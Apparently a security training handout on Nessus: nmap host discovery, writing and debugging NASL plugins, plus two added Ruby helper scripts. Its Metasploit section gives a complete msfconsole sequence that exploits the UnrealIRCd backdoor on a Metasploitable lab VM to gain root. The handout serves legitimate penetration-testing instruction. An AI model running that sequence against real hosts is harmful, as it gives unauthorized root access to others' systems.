Nessus Training Session 3 - Advanced Topics
Prepared by Ramsey Dow <ramsey@casaba.com> for NWACC

Contents

    Pre-scan Workflow
        Update plugin library
        Identify targets
    Scan Automation
    Custom Plugin Development
        Plugin IDs
        Where the plugins are
        Running plugins from the command line
        Signed and unsigned scripts
        Debugging
        Example from the NASL documentation
        Optimizing your script
        Rules for plugins
        How to install a custom plugin
        Test the new custom plugin
        How to remove custom plugins
    Using Nessus with Metasploit
    Useful Web Sites and Resources

Pre-scan Workflow

It's quite alright to let Nessus do everything for you. It does use Nmap under the hood. However, I like to take more control myself. Aside from satisfying the control freak in me, this also allows me to exclude the IPs of hosts I don't want to scan.

Update plugin library

Tenable updates Nessus plugins on a daily basis. The Nessus daemon pulls new updates once per 24-hour period, but new plugins can arrive many times throughout the day, so I update the plugins on the scan server before running any meaningful scan:

    sudo /opt/nessus/sbin/nessus-update-plugins

Identify targets

I have a scanning workspace that looks like this:

    scan/
        archive/
            2013/
                01/
                02/
                ...
                10/
        scripts/

I keep scan-related data in the archive directory, organized by year and month, and stash time-saving scripts in the scripts directory. In any given month when I scan a regularly scheduled target, I set the SCANPATH variable:

    SCANPATH="archive/`date +%Y`/`date +%m`"

Then I create the new workspace:

    mkdir -p $SCANPATH

Now I can use nmap directly to perform host discovery, with options that make sense for the engagement:

    sudo nmap --privileged -sn -oX ${SCANPATH}/network_name.xml ip/mask >& /dev/null

At this step I can use nmap's --exclude switch to skip IPs, such as those of fragile printers. This gives me an XML file containing the host discovery information.
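Nessus cannot read that XML directly; the author's nmap2nessus.rb, described next, bridges the gap, but the script itself is not reproduced in these notes. The following is an added Ruby example, not the author's script, that performs the same kind of conversion using only the standard library (REXML and IPAddr). It keeps IPv4 and IPv6 addresses of hosts nmap reports as up, drops hosts reported down, MAC addresses and hostnames, and de-duplicates. The sample XML is constructed for the example, not captured from a real scan.

```ruby
#!/usr/bin/env ruby
# Added example, not the author's nmap2nessus.rb: convert `nmap -sn -oX` host
# discovery output into a Nessus-style target list, one address per line.
require 'rexml/document'
require 'ipaddr'
require 'set'

# Constructed sample of `nmap -sn -oX` output (not a real scan): three hosts
# up (one via IPv6), one host down, and a duplicate entry for 10.211.55.7.
SAMPLE_NMAP_XML = <<~XML
  <nmaprun scanner="nmap" args="nmap -sn -oX - 10.211.55.0/24">
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="10.211.55.7" addrtype="ipv4"/>
      <address addr="00:1C:42:00:00:08" addrtype="mac"/>
      <hostnames><hostname name="metasploitable" type="PTR"/></hostnames>
    </host>
    <host>
      <status state="down" reason="no-response"/>
      <address addr="10.211.55.9" addrtype="ipv4"/>
    </host>
    <host>
      <status state="up" reason="syn-ack"/>
      <address addr="fe80::1" addrtype="ipv6"/>
    </host>
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="10.211.55.2" addrtype="ipv4"/>
    </host>
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="10.211.55.7" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

# Returns the IPv4/IPv6 addresses of every host nmap reported as "up",
# de-duplicated and sorted numerically (IPv4 before IPv6). MAC addresses and
# hostnames are skipped so the list holds one unambiguous IP per target;
# hosts reported "down" are dropped, as are addresses IPAddr rejects.
def nmap_xml_to_targets(xml)
  doc = REXML::Document.new(xml)
  targets = Set.new
  REXML::XPath.each(doc, '/nmaprun/host') do |host|
    status = REXML::XPath.first(host, 'status')
    next unless status && status.attributes['state'] == 'up'
    REXML::XPath.each(host, 'address') do |address|
      next unless %w[ipv4 ipv6].include?(address.attributes['addrtype'])
      begin
        targets << IPAddr.new(address.attributes['addr']).to_s
      rescue IPAddr::InvalidAddressError
        warn "skipping malformed address: #{address.attributes['addr']}"
      end
    end
  end
  targets.to_a.sort_by { |s| ip = IPAddr.new(s); [ip.ipv4? ? 4 : 6, ip.to_i] }
end

# Nessus scan templates accept one target per line.
def target_list(xml)
  nmap_xml_to_targets(xml).map { |t| "#{t}\n" }.join
end

if __FILE__ == $PROGRAM_NAME
  if ARGV.empty?
    warn "usage: #{$PROGRAM_NAME} network_name.xml > network_targets.txt"
  else
    print target_list(File.read(ARGV[0]))
  end
end
```

Hosts skipped with nmap's --exclude never appear in the XML at all, so the script's own filtering only has to deal with hosts that did not answer and with non-IP address records.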
Useful, to be sure, but not consumable by Nessus. I wrote a Ruby script to remedy the situation:

    ./scripts/nmap2nessus.rb ${SCANPATH}/network_name.xml > ${SCANPATH}/network_targets.txt

nmap2nessus.rb consumes the XML output from nmap and converts it into a Nessus-style host list, which I can upload directly into a Nessus scan template.

Scan Automation

lawnmower.rb demonstration.

Custom Plugin Development

NASL is the Nessus Attack Scripting Language: a C-like scripting language designed for implementing security tests. It comes with a couple of security guarantees:

    - it will not send any packet to a host other than the target host
    - it will not execute any commands on your local system

In addition, NASL maintains a small memory footprint compared to other scripting languages. It is not a full-featured language like Python or Ruby.

    # This example displays the FTP banner of the remote host:
    soc = open_sock_tcp(21);
    if (soc)
    {
      data = recv_line(socket:soc, length:1024);
      if (data)
      {
        display("The remote FTP banner is : \n", data, "\n");
      }
      else
      {
        display("The remote FTP server seems to be tcp-wrapped\n");
      }
      close(soc);
    }

Plugin IDs

Plugins are referenced by ID. Use 50000–52999 for custom plugins; the 60000–69999 range is used by SecurityCenter when it auto-generates plugin IDs for compliance checks.

Where the plugins are

Plugins live in the /opt/nessus/lib/nessus/plugins directory.

    .inc files contain functions and are included by NASL scripts.
    .nasl files are Nessus plugins.

Running plugins from the command line

You use the nasl program to run Nessus plugins from the command line. nasl is meant to be run server-side by nessusd, not by users, so when you run scripts with it by hand it is difficult to see what is happening.

    /opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/finger.nasl

This command checks for the presence of fingerd on localhost. nasl isn't meant to be user-friendly, and doesn't produce the output you might expect.
The -T option asks for a debug trace written to a file named f.out:

    $ tail -n 2 f.out
    [finger.nasl, 2258.1, 1381203487.704611] (TRACE) call open_sock_tcp(, , , , 79 )
    [finger.nasl, 2258.1, 1381203487.704777] (TRACE) ret -> 0

nasl tried to connect to port 79 and failed, hence ret -> 0: fingerd is not running on this machine.

Signed and unsigned scripts

By default, Nessus won't run unsigned scripts that perform privileged operations, where privileged means doing things that let the script escape its sandbox. Remember, NASL comes with security guarantees, including not doing unexpected bad things to the scan server running the script.

If your script does privileged things, you will have to edit /opt/nessus/etc/nessus/nessusd.conf.imported and change the line

    nasl_no_signature_check = no

to

    nasl_no_signature_check = yes

Bear in mind that this setting applies to every unsigned plugin the daemon runs, not just yours. If you are performing a traditional network check, you do not need to change it.

Additionally, you can pass the -X switch to nasl on the command line, which causes nasl to skip the signature check. This doesn't work with Nessus itself; for that you have to modify the nessusd.conf.imported file.

Debugging

When writing your own scripts it can be useful to engage in bouts of printf-style debugging to see what is going on.
You've got two options:

    display()
        Writes to stdout. When the script is run by nessusd, stdout is redirected to /var/nessus/logs/nessus.dump.

    debug_print()
        You need to include("global_settings.inc") in your script. This only fires if debug_level is non-zero.

Example from the NASL documentation

    $ /opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/test_ssh.nasl
    $ cat f.out
    [test_ssh.nasl, 5259.1, 1381205788.368034] (TRACE) call get_kb_item(Services/ssh )
    [test_ssh.nasl, 5259.1, 1381205788.368045] (TRACE) ret ->
    [test_ssh.nasl, 5259.1, 1381205788.368048] (TRACE) call get_port_state(22 )
    [test_ssh.nasl, 5259.1, 1381205788.368053] (TRACE) ret -> 1
    [test_ssh.nasl, 5259.1, 1381205788.368054] (TRACE) call open_sock_tcp(, , , , 22 )
    [test_ssh.nasl, 5259.1, 1381205788.368152] (TRACE) ret -> 1000000
    [test_ssh.nasl, 5259.1, 1381205788.368164] (TRACE) call recv(200 , , 1000000 , )
    [test_ssh.nasl, 5259.1, 1381205789.372535] (TRACE) ret -> SSH-2.0-OpenSSH_6.1p1 Debian-4..
    [test_ssh.nasl, 5259.1, 1381205789.372551] (TRACE) call close(1000000 )
    [test_ssh.nasl, 5259.1, 1381205789.372685] (TRACE) ret -> 0

Optimizing your script

The best way to optimize your script is to tell nessusd when not to launch it. If your script depends on a TCP port being open, indicate that your script requires that port to be open:

    script_require_ports(80, "Services/www");

Services/www is a symbolic value, as defined in the Nessus knowledge base. The knowledge base represents the state of a scan. Your script may require certain state to be present in order to run, e.g., anonymous FTP with writable directories:

    script_require_keys("ftp/anonymous", "ftp/writeable_dir");

This will only execute the script if the remote FTP server offers anonymous access and has a writable directory. You can also exclude keys:

    script_exclude_keys(k1, k2, ...);

This causes nessusd not to execute your script if at least one of the given keys is set in the knowledge base.
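The trace files shown under Debugging above are terse, and nasl prints no summary of them. As an added Ruby example, not part of the original training notes and not a Nessus or Tenable tool, the following pairs each `call` line with its `ret` line, computes how long each call took from the two timestamps, and picks out open_sock_tcp calls that returned 0, which is the failed connect the finger.nasl run showed. The sample input consists of the two traces shown above; the line format (`[script, pid, timestamp] (TRACE) call fn(args)` / `ret -> value`) is inferred from those lines, and the regular expressions and function names are the example's own.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original training notes or of Nessus: pair
# the `call` and `ret` lines of a `nasl -T` trace so each function call shows
# its return value and duration, then pick out failed connects.

# Trace lines copied from the finger.nasl and test_ssh.nasl runs shown above.
FINGER_TRACE = <<~TRACE
  [finger.nasl, 2258.1, 1381203487.704611] (TRACE) call open_sock_tcp(, , , , 79 )
  [finger.nasl, 2258.1, 1381203487.704777] (TRACE) ret -> 0
TRACE

SSH_TRACE = <<~TRACE
  [test_ssh.nasl, 5259.1, 1381205788.368034] (TRACE) call get_kb_item(Services/ssh )
  [test_ssh.nasl, 5259.1, 1381205788.368045] (TRACE) ret ->
  [test_ssh.nasl, 5259.1, 1381205788.368048] (TRACE) call get_port_state(22 )
  [test_ssh.nasl, 5259.1, 1381205788.368053] (TRACE) ret -> 1
  [test_ssh.nasl, 5259.1, 1381205788.368054] (TRACE) call open_sock_tcp(, , , , 22 )
  [test_ssh.nasl, 5259.1, 1381205788.368152] (TRACE) ret -> 1000000
  [test_ssh.nasl, 5259.1, 1381205788.368164] (TRACE) call recv(200 , , 1000000 , )
  [test_ssh.nasl, 5259.1, 1381205789.372535] (TRACE) ret -> SSH-2.0-OpenSSH_6.1p1 Debian-4..
  [test_ssh.nasl, 5259.1, 1381205789.372551] (TRACE) call close(1000000 )
  [test_ssh.nasl, 5259.1, 1381205789.372685] (TRACE) ret -> 0
TRACE

# Line format inferred from the traces above (assumption, not a documented grammar).
LINE_RE = /\A\[(?<script>[^,]+), (?<pid>[^,\]]+), (?<ts>\d+\.\d+)\] \(TRACE\) (?<kind>call|ret) (?<rest>.*)\z/
CALL_RE = /\A(?<fn>\w+)\((?<args>.*)\)\z/
RET_RE  = /\A->\s?(?<value>.*)\z/

# Parses a trace into events: {script:, fn:, args:, ret:, elapsed:}. A `ret`
# line closes the most recent unmatched `call`; elapsed is the difference of
# the two timestamps in seconds. Lines that do not match are ignored.
def parse_nasl_trace(text)
  events = []
  pending = [] # calls still waiting for their ret, innermost last
  text.each_line do |raw|
    line = raw.strip
    next unless (m = LINE_RE.match(line))
    if m[:kind] == 'call'
      next unless (c = CALL_RE.match(m[:rest]))
      pending << { script: m[:script], fn: c[:fn],
                   args: c[:args].split(',', -1).map(&:strip), ts: m[:ts].to_f }
    else
      call = pending.pop
      next unless call
      r = RET_RE.match(m[:rest])
      events << { script: call[:script], fn: call[:fn], args: call[:args],
                  ret: (r ? r[:value] : m[:rest]).strip,
                  elapsed: m[:ts].to_f - call[:ts] }
    end
  end
  events
end

# open_sock_tcp's last argument is the port. A return of 0 means nessusd could
# not connect (the "fingerd is not running" case); anything else is a socket.
def connection_attempts(events)
  events.select { |e| e[:fn] == 'open_sock_tcp' }.map do |e|
    { script: e[:script], port: e[:args].last.to_i,
      ok: !e[:ret].empty? && e[:ret] != '0' }
  end
end

# One readable line per event, e.g.
#   test_ssh.nasl recv(200, , 1000000, ) -> "SSH-2.0-OpenSSH_6.1p1 Debian-4.." [1.004s]
def summarize(events)
  events.map do |e|
    format('%s %s(%s) -> %p [%.3fs]', e[:script], e[:fn], e[:args].join(', '), e[:ret], e[:elapsed])
  end
end

if __FILE__ == $PROGRAM_NAME
  text = ARGV.empty? ? SSH_TRACE : File.read(ARGV[0])
  events = parse_nasl_trace(text)
  puts summarize(events)
  connection_attempts(events).each do |a|
    puts "#{a[:script]}: port #{a[:port]} #{a[:ok] ? 'open' : 'connect failed'}"
  end
end
```

Run it against the f.out written by `nasl -T` to get the whole session at a glance; the elapsed column is what makes a slow recv (one second on the SSH banner above) stand out from the microsecond knowledge-base lookups around it.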
Rules for plugins

    - Your script must never interact with the user.
    - Your script must test exactly one vulnerability.
    - Your script should belong to an existing family.
    - Check CVE for an existing definition of the vulnerability your script tests.

How to install a custom plugin

First, copy it to the plugins directory. Make sure you don't have a name conflict!

    sudo cp plugin.nasl /opt/nessus/lib/nessus/plugins

Stop the Nessus daemon:

    sudo service nessusd stop

Restart the Nessus daemon, instructing it to rebuild the plugin index:

    sudo /opt/nessus/sbin/nessusd -R

nessusd -R takes a long time because it recompiles the entire plugin database. You can use nessusd -t instead: it tells nessusd to recompile only the plugins whose timestamps have changed since the last run, which is much faster.

Test the new custom plugin

    1. Create a policy named ssh.
    2. Disable all plugin families.
    3. Enable service checks and the administrative toolbox family.
    4. Scan a test host using the ssh policy.
    5. Review the scan report.
    6. Disable ssh on the test host.
    7. Rescan the test host.
    8. Review the new scan report. Note that the lack of ssh on the test host is flagged as a vulnerability.

How to remove custom plugins

Stop the Nessus daemon:

    sudo service nessusd stop

Delete the custom .nasl files from /opt/nessus/lib/nessus/plugins, then restart the Nessus daemon, instructing it to rebuild the plugin index:

    sudo /opt/nessus/sbin/nessusd -R

The "Administrative toolbox" family will still show in policies that reference it. Clicking on the plugin group does nothing, since it contains no plugins (you removed them). The plugin family doesn't show up as an option in new policies. This weird behavior is why there is a rule about not creating new plugin families. Don't do it!

Using Nessus with Metasploit

Using Nessus with Metasploit is pretty easy and definitely a fun way to spend a Saturday afternoon! I installed Metasploit Framework 4 on Ubuntu Desktop 13.04.
    1. Scan something using Nessus (10.211.55.7 in the example below).
    2. Export the scan results in NBE format.
    3. scp the NBE file to your Metasploit host.
    4. Log in to the Metasploit host and follow this basic procedure:

    sudo msfconsole
    db_import bfd6a1940f2061ba5532f33c1197a359.nbe
    hosts
    services 10.211.55.7
    vulns 10.211.55.7 -p 6667
    search cve:2010-2075
    use exploit/unix/irc/unreal_ircd_3281_backdoor
    set RHOST 10.211.55.7
    exploit

Voila. root in just a few steps! For the record, my victim host was a VM running the Metasploitable 2 image.

Useful Web Sites and Resources

Scan Automation

    Nessus 5.0 REST Protocol Specification
    http://static.tenable.com/documentation/nessus_5.0_XMLRPC_protocol_guide.pdf

    CPAN module Net::Nessus::XMLRPC - Perl library for communication with the Nessus scanner (v4.2+) via XMLRPC
    https://github.com/kost/nessus-xmlrpc-perl

    Ruby gem/library for the Nessus XMLRPC interface, with a Nessus command line example
    https://github.com/kost/nessus-xmlrpc-ruby

    Python module written for automating tasks within the latest version of Nessus
    http://code.google.com/p/nessusxmlrpc/

Custom Plugin Development

    Complete list of Nessus plugins
    http://www.tenable.com/plugins/index.php?view=all

    The Nessus Attack Scripting Language Reference Guide
    http://www.dn-systems.org/boss/doc/nasl_guide-20050103.pdf

    NASL Documentation
    https://discussions.nessus.org/servlet/JiveServlet/download/5815-1228/nasl2_reference.pdf

Using Nessus with Metasploit

    Metasploit penetration testing tool
    http://www.rapid7.com/products/metasploit/download.jsp (grab Metasploit Framework from the bottom of the page)

    Metasploitable 2 - intentionally vulnerable Linux virtual machine
    http://sourceforge.net/projects/metasploitable/files/Metasploitable2/